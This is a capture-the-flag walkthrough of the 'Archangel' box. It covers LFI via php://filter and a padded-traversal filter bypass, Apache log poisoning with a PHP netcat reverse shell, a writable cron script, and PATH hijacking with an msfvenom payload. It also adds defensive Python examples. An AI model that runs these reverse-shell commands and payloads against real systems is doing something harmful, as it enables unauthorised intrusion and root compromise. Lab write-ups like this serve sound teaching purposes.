Archangel

Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (-Pn) so the scan still runs if ICMP ping is blocked:

nmap -Pn 10.10.104.47

Detailed Nmap Scan :

Command breakdown:

  • -sV: service version detection

  • -sC: default nmap scripts

  • -p 22,80: scan only ports 22 and 80 (the ones the first scan found open)

  • -oN nmap: save the normal output to a file called nmap

nmap -sV -sC -p 22,80 -oN nmap 10.10.104.47

Enumeration

Let's visit the webpage.

Looking at the page, we see a domain (mafialive.thm). Let's add it to our /etc/hosts file so the name resolves to the target.

Now let's browse to that virtual host.

We have the first flag.

Let's look for a robots.txt file, as it often lists paths the admin did not want indexed.

And we found one, let's visit the page it lists.

The page has a button, let's press it.

It takes us to a different page. Looking at the URL, the view parameter holds a file path, which suggests the page includes whatever file is named, a Local File Inclusion (LFI) candidate. Let's try some LFI payloads. I was searching on Google when I found this:

Exploitation

They say we can use this payload to bypass the filter and exploit the LFI. The php://filter wrapper with convert.base64-encode returns the target file base64-encoded instead of executing it, so it lets us read PHP source that would otherwise just run. Let's test it:

http://xqi.cc/index.php?m=php://filter/convert.base64-encode/resource=index

Let's adapt it to our host, parameter and target file:

http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/mrrobot.php

When we replace the current URL with this one, we get this:

It's a base64-encoded string. Decoding it gives the source of mrrobot.php, which contains the message we saw earlier.

Now let's read test.php itself the same way, since that is the file doing the include.

We get another base64-encoded string, let's decode it.

We have the second flag.

Now let's look at the code closely.

On line 17 we can see the conditions. The first is that the parameter must not contain the substring ../../, and the second is that it must contain the string /var/www/html/development_testing. The second is satisfied by starting our value with that directory. For the first, a plain ../../../ is blocked because it contains ../../, but the check is only a substring match: putting a harmless ./ (the current directory) between each ../ gives .././.././../, which never contains ../../ yet still climbs three directories when the path is resolved.

We know this is running on Apache, so there should be an access.log at /var/log/apache2/access.log. Let's check whether the include reaches it:

http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log
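To make the filter logic concrete, here is an added Python model of the two checks as the page describes them (this is not the box's own PHP): a substring filter that rejects ../../ and requires the development_testing path, a resolver that shows where each value really lands, and a hardened check that canonicalises first and then enforces the base directory. The candidate values are the ones from this walkthrough; BASE and the function names are mine.

```python
import posixpath
from urllib.parse import unquote

# Directory the page says test.php insists on (the second condition).
BASE = "/var/www/html/development_testing"


def vulnerable_filter(view: str) -> bool:
    """Model of the two substring checks the page describes on line 17 of
    test.php: reject any value containing '../../', require the value to
    contain the development_testing path. Returns True when the include
    would be allowed. Nothing here looks at where the path really ends up."""
    view = unquote(view)  # PHP hands $_GET to the script already URL-decoded
    return "../../" not in view and BASE in view


def resolve(view: str) -> str:
    """Where the include actually lands once '.' and '..' components are
    collapsed (posixpath.normpath, so no filesystem access is needed)."""
    return posixpath.normpath(unquote(view))


def hardened_filter(view: str) -> bool:
    """Canonicalise first, then require the resolved path to stay inside
    BASE. Wrapper schemes such as php:// never start with BASE, so they are
    rejected as well."""
    resolved = resolve(view)
    return resolved == BASE or resolved.startswith(BASE + "/")


def explain(view: str) -> dict:
    """Summarise one candidate value under both checks."""
    return {
        "view": view,
        "substring_filter_allows": vulnerable_filter(view),
        "resolves_to": resolve(view),
        "hardened_filter_allows": hardened_filter(view),
    }


if __name__ == "__main__":
    # Constructed candidates: the legitimate file, the naive traversal,
    # the './'-padded traversal from the page, and the php://filter payload.
    candidates = [
        BASE + "/mrrobot.php",
        BASE + "/../../../log/apache2/access.log",
        BASE + "/.././.././../log/apache2/access.log",
        "php://filter/convert.base64-encode/resource=" + BASE + "/mrrobot.php",
    ]
    for candidate in candidates:
        print(explain(candidate))
```

The substring filter blocks the naive traversal but lets the padded one through, and it lets the php://filter payload through because the required directory appears later in the string. The hardened check rejects both because it decides on the resolved path, not on what the string looks like; in real PHP code the equivalent is realpath() followed by a prefix check (which also defeats symlink tricks that normpath alone would not), or better still an allowlist of includable files.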

Now we can try log poisoning to get Remote Code Execution (RCE). Apache writes the User-Agent of every request into access.log, and the include executes any PHP it finds in the file it loads, so we have to get this reverse shell into the log by sending it in a request:

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f');?>

Make sure to set up a netcat listener on port 1234 first.

First we have to intercept the request with a proxy and put this code in the User-Agent header, which is what ends up in the log. The poisoned entry is written once, but every later load of access.log through the LFI will execute it.

Now when we send the request we get a reverse shell. If it doesn't come back on the first send, load the log URL again: Apache writes the entry when the request completes, so the poisoned line is included on the next request.
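The other side of this chain is what it leaves in the web server's own log. As an added example (not part of the original writeup), here is a small Python detector run over constructed access.log lines in Apache's combined format: it flags the php://filter source read, the ./-padded traversal aimed at access.log, and PHP tags arriving in the User-Agent. The sample lines, the tag names and the function names are mine.

```python
import re
from urllib.parse import unquote

# Apache "combined" log format:
# host ident authuser [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# PHP open tags, the thing that must never land in a file we later include.
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)

# Constructed sample lines (not real traffic): a normal hit, the php://filter
# source read, the padded traversal to access.log, and the poisoning request
# that carries PHP in its User-Agent.
SAMPLE_LOG = """\
10.13.8.64 - - [18/Jan/2021:10:00:01 +0000] "GET /robots.txt HTTP/1.1" 200 53 "-" "Mozilla/5.0"
10.13.8.64 - - [18/Jan/2021:10:01:12 +0000] "GET /test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php HTTP/1.1" 200 1180 "-" "Mozilla/5.0"
10.13.8.64 - - [18/Jan/2021:10:02:40 +0000] "GET /test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
10.13.8.64 - - [18/Jan/2021:10:03:05 +0000] "GET /test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log HTTP/1.1" 200 9120 "-" "<?php system('id'); ?>"
"""


def parse_line(line: str):
    """Split one combined-format line into its fields, or None if it does not parse."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else None


def classify(entry: dict) -> list:
    """Return the indicator tags that fire for one parsed entry."""
    tags = []
    request = unquote(entry["request"])  # catch %2e%2e%2f-style encoding too
    if "php://" in request.lower():
        tags.append("php_wrapper")      # stream wrapper in an include parameter
    if "../" in request:
        tags.append("path_traversal")   # any climb, padded with ./ or not
    if re.search(r"\b(access|error)\.log\b", request):
        tags.append("log_include")      # the log itself being requested
    for field in ("ua", "referer", "request"):
        if PHP_TAG.search(unquote(entry[field])):
            tags.append("php_in_" + field)  # poisoning payload written to the log
    return tags


def scan(log_text: str) -> list:
    """Return (ip, request, tags) for every parsed line with at least one tag."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        tags = classify(entry)
        if tags:
            hits.append((entry["ip"], entry["request"], tags))
    return hits


if __name__ == "__main__":
    for ip, request, tags in scan(SAMPLE_LOG):
        print(ip, tags, request)
```

Each indicator is weak on its own (php:// and ../ show up in scanner noise), but the combination on one client, a source read followed by a log include and then PHP in a User-Agent, is the full chain this section walks through. Apache escapes double quotes in logged headers as \", which the simple [^"]* field pattern does not handle; a production parser should account for that.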

Now let's stabilize the shell.

We can read the user.txt file.

Privilege Escalation

In the home/myfiles directory of archangel (/home/archangel/myfiles) there is a passwordbackup file, so let's check it out. It contains nothing but a YouTube link (a rickroll), so it's a dead end:

https://www.youtube.com/watch?v=dQw4w9WgXcQ

There is another directory called secret, which looks interesting. Let's try to change into it.

And we are not allowed: we need to be the user archangel to access it. Let's look for other files owned by archangel that we can reach:

find / -user archangel -type f 2>/dev/null

We find a few, and the first one looks interesting, so let's check it out.

It's a bash script. Let's look at the permissions to see if we can write to it.

Looks like we can. Since the script is owned by archangel, anything that runs it as archangel will run whatever we put in it, so let's echo a reverse shell into the file. Note that executing the script ourselves as www-data only gives us another www-data shell; the hop to archangel relies on the script being run as that user, so check what runs it (the system crontab is the usual place) and wait for that to fire.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f

Also make sure to start a netcat listener first.

Now let's echo the reverse shell into the file; the next time it runs as archangel, the listener catches the shell.

We are archangel now. Let's stabilize the shell.

Let's go into the secret directory.

We can read the user2.txt file. Let's look at the other file called backup.

Its output isn't readable, so let's see what type of file it is.

It's an ELF binary (file reports it as an LSB shared object, which is how a position-independent executable shows up). Let's use the strings command to look for readable text in it.

One string is interesting: the binary runs the cp command without its full path, so cp is looked up through the caller's PATH, which we control. If the binary runs with root privileges (check ls -l backup for the setuid bit), a fake cp found first in PATH is executed as root. Let's create an msfvenom payload called cp, put its directory at the front of PATH, and when the binary calls cp we should get a reverse shell:

msfvenom -p linux/x64/shell_reverse_tcp -f elf -o cp LHOST=10.13.8.64 LPORT=1234

Now we have to transfer the file, so let's start an HTTP server on the attacking machine:

python3 -m http.server 8000

Now use this command on the victim machine to download the file (the port must match the one the server is listening on). Make sure you are in the secret directory:

wget http://10.13.8.64:8000/cp

Now let's put the secret directory at the front of the PATH variable, so it is searched before /bin and /usr/bin:

echo $PATH
export PATH=/home/archangel/secret:$PATH
echo $PATH

Now start a netcat listener and make the cp file executable with chmod +x.

Now run the backup file.

And you should get a reverse shell as root.
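To show exactly why the relative cp is the problem and what the fix looks like, here is an added Python simulation (not the box's binary and not the writeup's commands): it runs a command through /bin/sh the way system() would, once with a fake cp placed at the front of PATH as the export PATH=... step above does, and once with the command written with an absolute path. The fake cp only prints HIJACKED instead of spawning a shell; the temp directory layout and function names are mine, and it assumes a Linux host with /bin/sh and a real cp on PATH.

```python
import os
import shutil
import subprocess
import tempfile

# Locate the real cp before PATH is tampered with. A hardened binary would
# hard-code a path like this instead of relying on lookup.
REAL_CP = shutil.which("cp") or "/bin/cp"


def simulate_backup(command: str, hijack: bool) -> tuple:
    """Run `command` through /bin/sh as system() would, optionally with a
    directory holding a fake `cp` at the front of PATH. Returns (stdout,
    whether the real copy happened). {src} and {dst} in `command` are
    replaced with files inside a throwaway directory."""
    workdir = tempfile.mkdtemp(prefix="pathhijack_")
    try:
        src, dst = os.path.join(workdir, "src"), os.path.join(workdir, "dst")
        with open(src, "w") as f:
            f.write("data\n")

        # Fake cp standing in for the msfvenom payload; it only announces itself.
        fake_dir = os.path.join(workdir, "fakebin")
        os.mkdir(fake_dir)
        fake_cp = os.path.join(fake_dir, "cp")
        with open(fake_cp, "w") as f:
            f.write("#!/bin/sh\necho HIJACKED\n")
        os.chmod(fake_cp, 0o755)

        path = os.environ.get("PATH", "/usr/bin:/bin")
        if hijack:
            path = fake_dir + os.pathsep + path  # same effect as export PATH=dir:$PATH
        env = dict(os.environ, PATH=path)
        result = subprocess.run(
            ["/bin/sh", "-c", command.format(src=src, dst=dst)],
            env=env, capture_output=True, text=True, check=False,
        )
        return result.stdout.strip(), os.path.exists(dst)
    finally:
        shutil.rmtree(workdir, ignore_errors=True)


def vulnerable_call(hijack: bool) -> tuple:
    """Relative command name, as seen in the strings output: resolved via PATH."""
    return simulate_backup("cp {src} {dst}", hijack)


def hardened_call(hijack: bool) -> tuple:
    """Absolute command name: PATH is never consulted, so the fake cp is ignored."""
    return simulate_backup(REAL_CP + " {src} {dst}", hijack)


if __name__ == "__main__":
    print("relative cp, hijacked PATH:", vulnerable_call(True))
    print("relative cp, clean PATH:   ", vulnerable_call(False))
    print("absolute cp, hijacked PATH:", hardened_call(True))
```

With the relative name and a poisoned PATH the fake cp runs and no copy is made; with a clean PATH or an absolute path the real cp runs. For a setuid program the fix is either the absolute path or resetting PATH to a known value before calling system(), since the environment is attacker-controlled. One more reason the page uses a compiled msfvenom payload rather than a shell script for the fake cp: bash drops the effective uid back to the real uid when the two differ (unless started with -p), so a #!/bin/bash script in that position can lose root where a native binary keeps it.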
